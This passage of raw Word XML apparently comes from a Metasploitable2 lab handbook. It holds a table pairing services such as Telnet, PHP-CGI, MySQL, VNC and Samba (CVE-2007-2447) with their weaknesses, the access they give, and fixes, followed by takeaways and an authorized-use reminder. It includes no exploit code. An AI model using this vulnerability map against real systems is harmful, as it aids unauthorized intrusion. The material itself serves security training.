            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Session / shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Key-based auth, strong passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Telnet (23)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Plaintext credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Session / shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Disable; replace with SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP (80)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PHP-CGI argument injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RCE / Meterpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Patch PHP/Apache, use PHP-FPM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SMTP (25)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">User enumeration / relay</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Info disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Disable VRFY/EXPN, restrict relay</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MySQL (3306)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Empty root password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DB admin access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Set strong password, restrict access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">VNC (5900)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Weak authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Full desktop access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Strong password, tunnel over SSH/VPN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SMB (445/139)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Username map script RCE (CVE-2007-2447)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Root shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Patch Samba, disable option</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Overarching Takeaways</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The majority of successful compromises in this lab stemmed from outdated software and weak/default credentials rather than novel, complex attack techniques — mirroring the most common root causes seen in real-world breaches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A consistent reconnaissance-to-exploitation workflow (discover → scan → research → exploit → stabilize) is transferable across virtually any target and service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every successful attack path documented here has a well-understood, achievable remediation, reinforcing that foundational security hygiene (patching, credential management, network segmentation) prevents the large majority of these compromises.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hands-on practice against a deliberately vulnerable, legally sanctioned target such as Metasploitable2 is an effective and safe way to build both offensive and defensive security skills.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30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DEEEE" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Reminder</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">This handbook is intended strictly for authorized educational and lab use against Metasploitable2 or equivalent sanctioned training environments. Do not apply these techniques to any system without explicit, documented authorization.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId27"/>
      <w:footerReference w:type="default" r:id="rId2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Metasploitable2 Exploitation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2026-09-23T19:58:35.985Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-23T19:58:35.985Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>